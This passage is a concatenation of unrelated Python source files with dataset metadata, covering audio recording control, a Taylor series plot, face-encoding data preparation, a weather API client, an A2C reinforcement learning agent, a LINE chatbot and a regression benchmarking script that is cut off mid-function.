onStartEnvironment(self):\n self._onStartEventWhichNeedSoundRecord(False)\n\n def hardStopOfRecording(self):\n self._threadSoundRecording.stop()\n self._currentSoundFileName = None\n self.onSoundRecordingStatusChanged.emit(False)\n\n def _onStartEventWhichNeedSoundRecord(self, isObservation: bool):\n if not self._threadSoundRecording.isProceeding:\n # on start observation when no sound recording is in progress\n self._isCurrentEventAnObservation = isObservation\n self._startRecording(isObservation)\n\n else:\n if self._isCurrentEventAnObservation == isObservation:\n self._startSameEventWhenRecordingIsInProgress(isObservation)\n else:\n self._stopRecording()\n self._isCurrentEventAnObservation = isObservation\n self._startRecording(isObservation)\n\n def _startSameEventWhenRecordingIsInProgress(self, isObservation: bool):\n # on start same event when sound recording is in progress\n self._threadSoundRecording.setAutomaticStopTimerSignal.emit(\n -1\n ) # cancel automatic stop\n soundEnd = \"{:.1f}\".format(self._threadSoundRecording.recordTimer_s())\n if self._startTimerOnRecordForCurrentEvent > 0:\n soundStart = \"{:.1f}\".format(\n self._startTimerOnRecordForCurrentEvent\n )\n else:\n soundStart = \"0\"\n if isObservation:\n self._finalizeObservation(\n self._currentSoundFileName, soundStart, soundEnd\n )\n else:\n self._finalizeEnvironment(\n self._currentSoundFileName, soundStart, soundEnd\n )\n self._startTimerOnRecordForCurrentEvent = (\n self._threadSoundRecording.recordTimer_s()\n )\n\n def onStopEventWhichNeedSoundRecord(self):\n # on end observation or environment changes\n self._threadSoundRecording.setAutomaticStopTimerSignal.emit(15)\n\n def onNewSession(self, workingDirectory: str):\n self._workingDirectory = workingDirectory\n\n def _createSoundRecording(self) -> ThreadForSoundRecording:\n threadSoundRecording = ThreadForSoundRecording(\n self._onAutomaticStopRecordingTimerEnded\n )\n return threadSoundRecording\n\n def _startRecording(self, isObservation: bool):\n dateTimeObj = datetime.now()\n timeTxt = dateTimeObj.strftime(\"%Y%m%d_%H%M%S\")\n if isObservation:\n self._currentSoundFileName = (\n \"observation_sound_recording_{}.wav\".format(timeTxt)\n )\n else:\n self._currentSoundFileName = (\n \"environment_sound_recording_{}.wav\".format(timeTxt)\n )\n\n soundFilePath = os.path.join(\n self._workingDirectory, self._currentSoundFileName\n )\n self._startTimerOnRecordForCurrentEvent = 0\n self._threadSoundRecording.start(soundFilePath)\n\n self.onSoundRecordingStatusChanged.emit(True)\n\n def _onAutomaticStopRecordingTimerEnded(self):\n self._stopRecording()\n\n def _stopRecording(self):\n soundEnd = \"{:.1f}\".format(self._threadSoundRecording.recordTimer_s())\n if self._startTimerOnRecordForCurrentEvent > 0:\n soundStart = \"{:.1f}\".format(\n self._startTimerOnRecordForCurrentEvent\n )\n else:\n soundStart = \"0\"\n\n if self._isCurrentEventAnObservation:\n self._finalizeObservation(\n self._currentSoundFileName, soundStart, soundEnd\n )\n else:\n self._finalizeEnvironment(\n self._currentSoundFileName, soundStart, soundEnd\n )\n\n self._threadSoundRecording.stop()\n self._currentSoundFileName = None\n self.onSoundRecordingStatusChanged.emit(False)\n\n def _finalizeEnvironment(\n self, soundFile: str, soundStart: str, soundEnd: str\n ):\n self._startTimerOnRecordForCurrentEvent = None\n self.onStopSoundRecordingForEventSignal.emit(\n False, soundFile, soundStart, soundEnd\n )\n\n def _finalizeObservation(\n self, soundFile: str, soundStart: str, soundEnd: str\n ):\n 
self._startTimerOnRecordForCurrentEvent = None\n self.onStopSoundRecordingForEventSignal.emit(\n True, soundFile, soundStart, soundEnd\n )\n","repo_name":"pblottiere/sammo-boat","sub_path":"src/core/sound_recording_controller.py","file_name":"sound_recording_controller.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"38865522118","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef animate_series(fk, M, N, xmin, ymin, xmax, ymax, n, exact):\n plt.axis([xmin, xmax, ymin, ymax])\n plt.xlabel('x')\n plt.ylabel('y')\n\n x = np.linspace(xmin, xmax, n)\n s = 0\n\n lines = plt.plot(x, fk(x, N), linewidth = 3)\n for k in range(M, N+1):\n s += fk(x, k)\n lines[0].set_ydata(s)\n plt.plot(x, exact(x),'g--')\n plt.draw()\n plt.pause(0.3)\n\n# Example sin(x):\nexact = lambda x: np.sin(x)\ndef fk(x,k):\n return (-1)**k * x**(2*k+1) / np.math.factorial(2*k+1)\nM = 0\nN = 40\nxmin = 0\nxmax = 13 * np.pi\nymin = -2\nymax = 2\nn = 100\nanimate_series(fk, M, N, xmin, ymin, xmax, ymax, n, exact)\n","repo_name":"AntonBrekke/Python","sub_path":"animate_taylor_series.py","file_name":"animate_taylor_series.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27096043027","text":"from params import RANDOM_SEED, LocationConfig, CreateDataConfig\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nfrom pathlib import Path\nimport face_recognition\nfrom tqdm import tqdm\nfrom PIL import Image\nimport pandas as pd\nimport numpy as np\nimport insightface\nimport fnmatch\nimport pickle\nimport torch\nimport cv2\nimport os\n\ndef create_new_data_directories(path):\n Path(path).mkdir(exist_ok=True, parents=True)\n Path(path + 'train').mkdir(exist_ok=True, parents=True)\n Path(path + 'test').mkdir(exist_ok=True, parents=True)\n Path(LocationConfig.crop_images).mkdir(exist_ok=True, parents=True)\n \ndef get_short_video_name(videoNames):\n ShortVideoName = []\n for videoName in videoNames.values:\n ShortVideoName.append(videoName.split('.')[0])\n return ShortVideoName\n\ndef create_mean_video_name_df(df):\n cols = ['ValueExtraversion','ValueAgreeableness','ValueConscientiousness','ValueNeurotisicm','ValueOpenness','ShortVideoName']\n grouped_df = df[cols].groupby('ShortVideoName')\n mean_df = grouped_df.mean()\n mean_df = mean_df.reset_index()\n return mean_df\n\n\ndef create_dataset_ChaLearn(images_path, end_path):\n create_new_data_directories(end_path)\n df = pd.read_csv(LocationConfig.labels + 'bigfive_labels.csv')\n\n df['ShortVideoName'] = get_short_video_name(df['VideoName'])\n\n mean_df = create_mean_video_name_df(df)\n mean_df.to_csv(LocationConfig.labels + 'bigfive_labels_mean.csv')\n df = mean_df.set_index('ShortVideoName')\n all_x = np.array(df.index)\n X_train, X_test = train_test_split(\n all_x, \n test_size=CreateDataConfig.test_size_ratio,\n random_state=0\n )\n\n images_dict_train = {'X':[], 'Y':[]}\n images_dict_test = {'X':[], 'Y':[]}\n total_files = len(fnmatch.filter(os.listdir(images_path), '*.jpg'))\n\n for image_path in tqdm(Path(images_path).glob('*.jpg'), total=total_files):\n img = face_recognition.load_image_file(str(image_path))\n face_locations = face_recognition.face_locations(img, model=\"cnn\")\n codes = face_recognition.face_encodings(img, known_face_locations=face_locations, model=\"large\")\n if len(codes) < 1:\n continue\n image_group = 
image_path.name.split('.')[0]\n Y = df.loc[image_group].values\n image_no = image_path.name.split('.')[2][-5:]\n if CreateDataConfig.classification:\n Y = list(np.where(Y>CreateDataConfig.Y_threshold, 1, 0))\n if image_group in X_test:\n images_dict_test['X'].append(codes[0])\n# images_dict_test['X'].append(img)\n images_dict_test['Y'].append(Y)\n else:\n images_dict_train['X'].append(codes[0])\n# images_dict_train['X'].append(img)\n images_dict_train['Y'].append(Y)\n \n with open(end_path + 'train/train.pickle', 'wb') as handle:\n pickle.dump(images_dict_train, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(end_path + 'test/test.pickle', 'wb') as handle:\n pickle.dump(images_dict_test, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \ncreate_dataset_ChaLearn(LocationConfig.crop_images, LocationConfig.enc)","repo_name":"Krl1/PersonalityPrediction","sub_path":"transf.py","file_name":"transf.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72600689752","text":"import json\nimport os\nimport logging\nimport requests\nimport gzip\n\nfrom src.data.enums import Constants\n\n\ndef download_city_list():\n url = \"https://bulk.openweathermap.org/sample/current.city.list.json.gz\"\n city_list = requests.get(url)\n if not os.path.exists(Constants.CITY_LIST.value):\n logging.info('Downloading city list from source')\n with open(Constants.CITY_LIST_GZ.value, 'wb') as file:\n file.write(city_list.content)\n block_size = 65536\n with gzip.open(Constants.CITY_LIST_GZ.value, 'rb') as source, \\\n open(Constants.CITY_LIST.value, 'wb') as dest:\n while True:\n block = source.read(block_size)\n if not block:\n break\n else:\n dest.write(block)\n os.remove(Constants.CITY_LIST_GZ.value)\n\n\nclass Weather:\n \"\"\"This class manages weather info through the OpenWeatherMap API\"\"\"\n\n api_key = os.environ.get('OPENWEATHERMAP_ID')\n\n def __init__(self, city):\n self.city = city\n download_city_list()\n\n def weather_info(self):\n \"\"\"\n :return: the weather info in json format\n \"\"\"\n logging.info('Getting weather info...')\n with open(Constants.CITY_LIST.value, 'r', encoding='utf-8') as file:\n cities = json.load(file)\n url = \"https://api.openweathermap.org/data/2.5/weather?id=%s&appid=%s&lang=%s&units=metric\" % (\n self.get_city_id(cities), self.api_key, \"hu\")\n response = requests.get(url)\n return json.loads(response.text)\n\n def get_city_id(self, cities):\n to_return_id = None\n for city in cities:\n if city['name'] == self.city:\n to_return_id = city['id']\n return to_return_id\n\n\nif __name__ == \"__main__\":\n w = Weather('Budapest')\n print(w.weather_info())\n","repo_name":"D3w4r/myradio","sub_path":"src/data/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43431982538","text":"from __future__ import print_function\n\nimport os\n\nimport sys\nimport argparse\nimport numpy as np\nnp.random.seed(0)\nimport pickle as pkl\nimport tensorflow as tf\nimport keras\nfrom keras.optimizers import Adam\nfrom keras.callbacks import TensorBoard\n\nimport gym\nfrom gym import wrappers\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom time import time\nimport pickle as pkl\n\nimport math\n\n\ndef write_log(callback, names, logs, batch_no):\n for name, value in zip(names, logs):\n summary = tf.Summary()\n summary_value = 
summary.value.add()\n summary_value.simple_value = value\n summary_value.tag = name\n callback.writer.add_summary(summary, batch_no)\n callback.writer.flush()\n\nclass A2C():\n def __init__(self, env, args):\n self.env = env\n self.args = args\n self.nS = self.env.observation_space.shape[0]\n self.nA = self.env.action_space.n\n\n with open(self.args.model_config_path, 'r') as f:\n shared_model = keras.models.model_from_json(f.read()) \n shared_model.pop()\n\n kernel = keras.initializers.VarianceScaling(scale=1.0, mode='fan_avg', \n distribution='normal', seed=None)\n actor_model = keras.layers.Dense(self.nA, activation='softmax', name='act_output', \n kernel_initializer= kernel)\n critic_model = keras.layers.Dense(1, activation='linear', name='crit_output', \n kernel_initializer= kernel)\n\n state_input = keras.layers.Input(shape=(self.nS,), name='state_input')\n shared_output = shared_model(state_input)\n actor_output = actor_model(shared_output)\n critic_output = critic_model(shared_output)\n\n self.model = keras.models.Model(inputs=state_input, outputs=[actor_output, critic_output])\n\n if self.args.mode=='train' and self.args.resume:\n print('*'*80)\n print ('Resuming Training from last Checkpoint')\n print('*'*80)\n best_model_path = sorted([int(ep) for ep in os.listdir(self.args.model_path)])[-1]\n self.model.load_weights(os.path.join(self.args.model_path, str(best_model_path)))\n self.episodes_done = best_model_path\n else:\n self.episodes_done = 0\n\n self.n = args.n\n self.lr = args.lr\n self.gamma = args.gamma\n\n def truncated_discounted_rewards(self, rewards):\n \n batch_size = len(rewards)-self.n\n truncated_rewards = np.zeros(batch_size)\n for t in range(batch_size):\n cumulative = 0\n for i in range(0, self.n):\n cumulative += math.pow(self.gamma, i)*rewards[t + i]\n truncated_rewards[t] = cumulative\n return truncated_rewards\n\n def get_value_reward(self, states, rewards, values):\n\n extended_values = values + [0]*self.n\n extended_rewards = rewards + [0]*self.n\n truncated_discounted_rewards = self.truncated_discounted_rewards(extended_rewards)\n batch_size = len(rewards)\n discounted_rewards = np.zeros_like(rewards)\n for t in reversed(range(batch_size)):\n discounted_rewards[t] = math.pow(self.gamma,self.n)*extended_values[t+self.n] + \\\n truncated_discounted_rewards[t]\n return discounted_rewards\n\n\n def train(self):\n \n if self.args.optimizer == \"adam\":\n self.optimizer = Adam(lr = self.args.lr)\n \n self.model.compile(optimizer='rmsprop',\n loss={'act_output': 'categorical_crossentropy', 'crit_output': 'mean_squared_error'},\n loss_weights={'act_output': 1., 'crit_output': 0.2})\n \n total_act_loss = []\n total_crit_loss = []\n all_rewards = []\n\n tensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\n train_names = ['metric' , 'actor_loss', 'critic_loss']\n val_names = ['val_metric', 'val_actor_loss', 'val_critic_loss']\n tensorboard.set_model(self.model)\n\n for episode in range(self.episodes_done ,self.args.num_episodes):\n print(\"Training episode {0}\".format(episode))\n ## Generate Episode\n states, actions, rewards, values = self.generate_episode(self.env, self.args.render)\n discounted_rewards = self.get_value_reward(states, rewards, values)\n\n states = np.array(states)\n act_target = np.zeros((len(states),self.nA))\n act_target[np.arange(len(states)), np.array(actions)] = (np.array(discounted_rewards) \n - np.array(values))\n\n crit_target = np.array(discounted_rewards)\n\n metric , act_loss, crit_loss = self.model.train_on_batch(states, 
{'act_output': act_target,\n                                        'crit_output': crit_target}, )\n            logs = [metric, act_loss, crit_loss]\n            write_log(tensorboard, train_names, logs, episode)\n\n            total_act_loss.append(act_loss)\n            total_crit_loss.append(crit_loss)\n            all_rewards.append(np.sum(rewards)*1e2)\n\n\n            if (episode + 1) % self.args.log_every == 0:\n                if self.args.verbose:\n                    print(\"Num Episodes: {0}, Train Reward: {1} +/- {2}, Act Loss: {3}, Crit Loss: {4}\".\n                        format(episode+1, np.mean(all_rewards), np.std(all_rewards), \n                            np.mean(total_act_loss), np.mean(total_crit_loss)))\n                total_act_loss = []\n                total_crit_loss = []\n                all_rewards = []\n            \n            if (not self.args.trial) and(episode + 1) % self.args.eval_after == 0:\n                if self.args.verbose:\n                    print(\"Saving Model Weights\")\n                self.model.save_weights(os.path.join(self.args.model_path, str(episode+1)))\n\n            sys.stdout.flush()\n\n    \n    def test_episode(self, num_test_episodes = 100):\n        all_rewards = [] \n        for i in range(num_test_episodes):\n            _ ,_ , rewards, _ = self.generate_episode(self.env, self.args.render)\n            episode_reward = np.sum(rewards)\n            all_rewards.append(episode_reward*1e2)\n        \n        average_reward = np.mean(all_rewards)\n        std_reward = np.std(all_rewards)\n        return average_reward, std_reward\n    \n    def test(self):\n        trained_episodes = sorted([int(ep) for ep in os.listdir(self.args.model_path)])\n        performance = []\n        for episode in trained_episodes:\n            self.model.load_weights(os.path.join(self.args.model_path, str(episode)))\n            average_reward, std_reward = self.test_episode()\n            performance.append([episode, average_reward, std_reward])\n            print('*'*80)\n            print(\"Average reward after {0} episodes: {1} +/- {2}\".format(episode, \n                    average_reward, std_reward))\n            print('*'*80)\n        self.plot_performance(performance)\n\n    def test_single(self, episode):\n        if self.args.render:\n            self.env = wrappers.Monitor(self.env, self.args.video_path,\n                            video_callable=lambda episode_id: True, force=True)\n\n        self.model.load_weights(os.path.join(self.args.model_path, str(episode)))\n        all_rewards = []\n        for i in range(self.args.num_test_episodes):\n            _, _, rewards, _ = self.generate_episode(self.env, self.args.render)\n            episode_reward = np.sum(rewards)\n            all_rewards.append(episode_reward*100)\n\n        average_reward = np.mean(all_rewards)\n        std_reward = np.std(all_rewards)\n        return average_reward, std_reward\n\n\n    def generate_episode(self, env, render = False):\n        \n        states = []\n        actions = []\n        rewards = []\n        values = []\n        \n        current_state = env.reset()\n        is_terminal = False\n        while not is_terminal:\n            action_distribution, cricval = self.model.predict(np.expand_dims(current_state, 0))\n            action = np.random.choice(env.action_space.n, 1, \n                        p=action_distribution.squeeze(0))[0]\n            next_state, reward, is_terminal, _ = env.step(action)\n            states.append(current_state)\n            actions.append(action)\n            rewards.append(reward*1e-2)\n            values.append(cricval.squeeze(0)[0])\n            current_state = next_state\n        \n        return states, actions, rewards, values\n    \n    def plot_performance(self, performance):\n        \n        X = [x[0] for x in performance]\n        Y = [x[1] for x in performance]\n        Z = [x[2] for x in performance]\n\n        plt.figure()\n        plt.errorbar(X, Y, yerr = Z, ecolor='r', capsize = 2)\n        plt.axhline(y=200, linestyle='--')\n        plt.xlabel('Episodes')\n        plt.ylabel('Average Reward')\n        plt.title(\"Performance of A2C Algorithm (n=\"+str(self.args.n)+\") on Lunar Lander\")\n        plt.savefig(self.args.plot_path,dpi = 200)\n\n\ndef parse_arguments():\n    \n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('--model-config-path', dest='model_config_path', 
type=str,\n default='LunarLander-v2-config.json',\n help=\"Path to the model config file.\")\n parser.add_argument('--result_path', dest='result_path',type=str, \n default='a2c_keras',\n help=\"Path to the model.\")\n parser.add_argument('--video_path', dest='video_path',type=str,\n default='a2c_keras/videos/ ',\n help=\"Path to the video folder.\")\n parser.add_argument('--resume', dest='resume', type=int, default=0, \n help=\"Resume the training from last checkpoint\")\n\n parser.add_argument('--num-episodes', dest='num_episodes', type=int, \n default=50000, \n help=\"Number of episodes to train on.\")\n parser.add_argument('--eval_after', dest='eval_after', type=int, \n default=500, \n help=\"Number of episodes to evaluate after.\")\n parser.add_argument('--log_every', dest='log_every', type=int, \n default=25, \n help=\"Number of episodes to log after.\")\n parser.add_argument('--gamma', type=float, dest='gamma', \n default = 1)\n \n parser.add_argument('--run', type=int, dest='run', default=1)\n parser.add_argument('--seed', type=int, dest='seed', default=0)\n parser.add_argument('--episode_number', type=int, dest='episode_number', default=0)\n parser.add_argument('--num_test_episodes', type=int, dest='num_test_episodes', default=1)\n parser.add_argument('--trial', dest='trial', action='store_true',\n help=\"If it is just a trial\")\n parser.add_argument('--verbose', dest='verbose', action='store_true',\n help=\"Whether to print loss after every episode.\")\n parser.add_argument('--mode', type=str, dest='mode', \n default='train',\n help=\"Optimizer to be Used\")\n \n parser_group = parser.add_mutually_exclusive_group(required=False)\n parser_group.add_argument('--render', dest='render', \n action='store_true',\n help=\"Whether to render the environment.\")\n parser_group.add_argument('--no-render', dest='render', \n action='store_false',\n help=\"Whether to render the environment.\")\n parser.set_defaults(render=False)\n\n parser.add_argument('--n', dest='n', type=int,\n default=100, help=\"The value of N in N-step A2C.\")\n parser.add_argument('--lr', dest='lr', type=float, default=1e-3, \n help=\"The learning rate.\")\n parser.add_argument('--optimizer', type=str, dest='optimizer', \n default='adam', help=\"Optimizer to be Used\")\n \n args = parser.parse_args()\n \n if not os.path.exists(args.result_path):\n os.makedirs(args.result_path)\n \n args.model_path = os.path.join(args.result_path, \n 'a2c_model' +str(args.run) + '_' + str(args.n))\n \n if not os.path.exists(args.model_path):\n os.makedirs(args.model_path)\n \n args.plot_path = os.path.join(args.result_path, 'a2c_plot' +str(args.run) + \n '_' + str(args.n) + '.png')\n \n return args\n\n\ndef main(args):\n \n # Parse command-line arguments.\n args = parse_arguments()\n \n # Create the environment.\n env = gym.make('LunarLander-v2')\n env.seed(args.seed)\n \n a2c = A2C(env, args)\n\n # best model at;\n # best_model_path = sorted([int(ep) for ep in os.listdir(args.model_path)])[-1]\n\n if args.mode == 'train':\n a2c.train()\n \n elif args.mode == 'test':\n a2c.test()\n elif args.mode == 'video':\n average_reward, std_reward = a2c.test_single(args.episode_number)\n print(average_reward, std_reward)\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"bhargaviparanjape/A2C","sub_path":"src/a2c_keras.py","file_name":"a2c_keras.py","file_ext":"py","file_size_in_byte":13354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} 
+{"seq_id":"71115691991","text":"#這些是LINE官方開放的套件組合透過import來套用這個檔案上\r\nfrom linebot import (LineBotApi, WebhookHandler)\r\nfrom linebot.exceptions import (InvalidSignatureError)\r\nfrom linebot.models import *\r\nfrom User import *\r\nimport json\r\nfrom linebot.models import QuickReply, QuickReplyButton, MessageAction\r\n\r\ndef quick_reply(words: list):\r\n tags = list()\r\n for word in words:\r\n tags.append(QuickReplyButton(\r\n action=MessageAction(label=word,text=word)\r\n ))\r\n return QuickReply(items=tags)\r\n\r\ndef follow_event_message():\r\n return TextSendMessage(text='Hi! My name is Ric. You can click \\\"About Me\\\" and choose the following squares to know me more.')\r\n\r\ndef text_msg(user, msg):\r\n if msg.lower() == 'basic info':\r\n user.state = 1\r\n message = list()\r\n message.append(TextSendMessage(text=\"I major in Electrical Engineering. I got GPA: 4.17/4.30 in last semester and I am also the TA of Signals and Systems.\\nThe following is my CV.\"))\r\n FlexMessage = json.load(open('Basicinfo_CV.json','r',encoding='utf-8'))\r\n message.append(FlexSendMessage('Basicinfo_CV', FlexMessage))\r\n return message\r\n elif msg.lower() == 'side project':\r\n user.state = 2\r\n message = list()\r\n message.append(TextSendMessage(text='I like to discover the inconvenience in our daily life. These following side projects are designed by myself, using the knowledge which learned in the class and built in my own free time.'))\r\n FlexMessage = json.load(open('Sideproject.json','r',encoding='utf-8'))\r\n message.append(FlexSendMessage('Sideproject', FlexMessage))\r\n return message\r\n elif msg.lower() == 'course':\r\n user.state = 3\r\n FlexMessage = json.load(open('Course.json','r',encoding='utf-8'))\r\n return FlexSendMessage('Course',FlexMessage)\r\n elif msg.lower() == 'skills':\r\n user.state = 4\r\n image_message = ImageSendMessage(\r\n original_content_url='https://i.imgur.com/qmzi3q8.jpg',\r\n preview_image_url='https://i.imgur.com/qmzi3q8.jpg'\r\n )\r\n return image_message\r\n elif msg.lower() == 'contact':\r\n user.state = 5\r\n FlexMessage = json.load(open('Contact.json','r',encoding='utf-8'))\r\n return FlexSendMessage('Contact info',FlexMessage)\r\n elif msg.lower() == 'activities':\r\n user.state = 6\r\n FlexMessage = json.load(open('Activities.json','r',encoding='utf-8'))\r\n return FlexSendMessage('Activities',FlexMessage)\r\n else:\r\n return TextSendMessage(\r\n text='Hi, If you wanna know me more, please click one topic that you are interested with.',\r\n quick_reply=quick_reply(['Basic Info', 'Side Project', 'Course', 'Skills', 'Contact', 'Activities'])\r\n )\r\n\r\n","repo_name":"cornliu/Self-introduction-linebot","sub_path":"message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37658088616","text":"#! 
/usr/bin/env python3\n# General system\nimport os\nimport itertools\nimport typer\nfrom datetime import datetime\nfrom pathlib import Path\n\n# General research libraries\nimport numpy as np\nimport pandas as pd\n\n# Presentation options\nfrom rich import print\nfrom rich.console import Group\nfrom rich.panel import Panel\nfrom rich.live import Live, Console\nfrom rich.progress import (\n    Progress,\n    BarColumn,\n    SpinnerColumn,\n    TextColumn,\n    TimeElapsedColumn,\n)\n\n\n# Machine Learning libraries\nfrom sklearn.base import clone\nfrom sklearn.preprocessing import Normalizer, StandardScaler\nfrom sklearn.decomposition import PCA, FastICA\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.linear_model import SGDRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble import (\n    BaggingRegressor,\n    GradientBoostingRegressor,\n    RandomForestRegressor,\n)\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.model_selection import KFold, cross_validate\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.impute import KNNImputer\nfrom sklearn.feature_selection import (\n    SelectPercentile,\n    f_regression,\n    mutual_info_regression,\n)\n\n# TODO include Transformin & Regressorin from sklearn to be able to create the classes and use them in the pipeline\n\n\n# Import of own libraries\nfrom .util.cli_report import screen_header, report, report_arguments, report_output\n\n\n# Define the progress bars\noverall_progress = Progress(\n    TimeElapsedColumn(), BarColumn(), TextColumn(\"{task.description}\")\n)\n\nexperiment_progress = Progress(TimeElapsedColumn(), TextColumn(\"{task.description}\"))\n\ntraining_progress = Progress(\n    TextColumn(\"{task.description}\"), SpinnerColumn(\"dots\"), BarColumn()\n)\npartition_progress = Progress(TimeElapsedColumn(), TextColumn(\"{task.description}\"))\n\ngroup_progress = Group(\n    Panel(partition_progress, width=80, title=\"Partitions...\"),\n    Panel(\n        Group(experiment_progress, training_progress), width=80, title=\"Experiments...\"\n    ),\n    overall_progress,\n)\n\n# Basic treatment of the data\nscales = {\n    \"Nothing\": None,\n    \"Normalization\": Normalizer(),\n    \"StandardScaler\": StandardScaler(),\n}\n\n# Define possible preprocessing paths\npreprocesses = {\n    \"Nothing\": None,\n    \"PCA\": PCA(),\n    \"F-score\": SelectPercentile(f_regression, percentile=90),\n    \"MI\": SelectPercentile(mutual_info_regression, percentile=90)\n    # TODO possibility of implementing an autoencoder to reduce the dimensionality\n}\n\n# Define the regressors to be tested\nregressors = {\n    \"PLS\": PLSRegression(),\n    \"SGDRegressor\": SGDRegressor(),\n    \"SVM\": SVR(),\n    \"Bagging\": BaggingRegressor(),\n    \"Boosting\": GradientBoostingRegressor(),\n    \"RandomForest\": RandomForestRegressor(),\n    \"MLP\": MLPRegressor(hidden_layer_sizes=(100,), max_iter=1000, early_stopping=True)\n    # TODO implement a class for a simple convolutional network\n}\n\n\n@report_arguments(label=None)\ndef load_data(filepath: Path) -> pd.DataFrame:\n    \"\"\"\n    Load the data from a specific file\n    \"\"\"\n    if filepath.is_file():\n        data = pd.read_excel(filepath, index_col=0)\n        return data\n    else:\n        raise FileNotFoundError(\"No file found in the specific location\")\n\n\n@report_arguments(label=None)\ndef prepare_data(data: pd.DataFrame, n_splits: int, seed=None, index_file=None):\n    X = data.iloc[:, 6:]\n    y = data.iloc[:, 5].ravel()\n    X = X.astype(\"float64\")\n    if index_file:\n        indexes = np.loadtxt(index_file).astype(\"int\")\n        data = data.reset_index()\n        
splits = (\n            (data[indexes != i].index, data[indexes == i].index)\n            for i in np.unique(indexes)\n        )\n    else:\n        cv = KFold(n_splits=n_splits, shuffle=True, random_state=seed)\n        splits = cv.split(X, y)\n\n    return splits, (X, y)\n\n\ndef run_experiments(data, splits):\n    # Define the possible combinations\n    experiments = itertools.product(\n        scales.keys(), preprocesses.keys(), regressors.keys()\n    )\n\n    results = pd.DataFrame(columns=[\"scale\", \"preprocess\", \"regressor\", \"R2\", \"RMSE\"])\n\n    experiments, test_number = itertools.tee(experiments)\n    test_number = len(list(test_number))\n\n    X = data[0]\n    y = data[1]\n    with Live(group_progress):\n        id_overall = overall_progress.add_task(\"\", total=test_number)\n        id_train_progress = training_progress.add_task(\n            \"[red]Training[/red]\", total=None\n        )\n        completed_experiments = list()\n\n        for index, (scale, preprocess, regressor) in enumerate(experiments):\n            overall_progress.update(\n                id_overall,\n                description=f\"{index} of {test_number} Experiments Completed\",\n            )\n            id_experiment = experiment_progress.add_task(\n                f\"[red]({scale}->{preprocess}->{regressor})[/red]\"\n            )\n            pipeline = make_pipeline(\n                scales[scale], preprocesses[preprocess], regressors[regressor]\n            )\n            pipeline = clone(pipeline)\n            splits, cv = itertools.tee(splits)\n            # TODO change to the RandomSearchCV\n            scores = cross_validate(\n                pipeline,\n                X,\n                y,\n                cv=cv,\n                scoring=(\"r2\", \"neg_root_mean_squared_error\"),\n                return_train_score=True,\n                n_jobs=-1,\n            )\n            results.loc[len(results.index)] = [\n                scale,\n                preprocess,\n                regressor,\n                scores[\"test_r2\"],\n                scores[\"test_neg_root_mean_squared_error\"],\n            ]\n            overall_progress.update(id_overall, advance=1)\n            experiment_progress.stop_task(id_experiment)\n            experiment_progress.update(\n                id_experiment,\n                description=f\"[green]({scale}->{preprocess}->{regressor}) ✅ [/green]\",\n            )\n            completed_experiments.append(id_experiment)\n            if len(completed_experiments) > 10:\n                experiment_progress.update(completed_experiments.pop(0), visible=False)\n        # Clear remaining lines in the panel before another run\n        for id_experiment in completed_experiments:\n            experiment_progress.update(id_experiment, visible=False)\n\n        training_progress.update(id_train_progress, visible=False)\n        overall_progress.update(id_overall, visible=False)\n\n    # Flatten the results, making a row for each test; it takes care to pair both columns\n    results = results.apply(pd.Series.explode)\n\n    return results\n\n\ndef regression(\n    datapath: str, seed: int, n_splits: int = 10, output_filename: str = None\n):\n    screen_header(\"Setting up the Laboratory\")\n    filepath = Path(datapath)\n    problem_name = filepath.stem\n    partitions_dir = Path(filepath.parent) / \"_partitions_\"\n    try:\n        data = load_data(filepath)\n    except:\n        print(\n            f\"[bold red]ERROR[/bold red] Unable to load file [yellow] {filepath}[/yellow]\"\n        )\n        return\n\n    screen_header(\"Starting Experiments\")\n    results_filename = (\n        output_filename\n        if output_filename\n        else f'{datetime.today().strftime(\"%Y%m%d\")}_{problem_name}_results.xlsx'\n    )\n\n    origins = np.append(data[\"Origen\"].unique(), None)\n    waters = np.append(data[\"Tipo de agua\"].unique(), None)\n    with pd.ExcelWriter(results_filename) as writer:\n        for origin, water in itertools.product(origins, waters):\n            if origin is None:\n                origin = \"all\"\n                partition = data\n            else:\n                partition = data[data.Origen == origin]\n\n            if water is None:\n                water = \"all\"\n            else:\n                partition = partition[partition[\"Tipo de agua\"] == water]\n\n            partition_name = f\"{origin}_{water}\"\n            
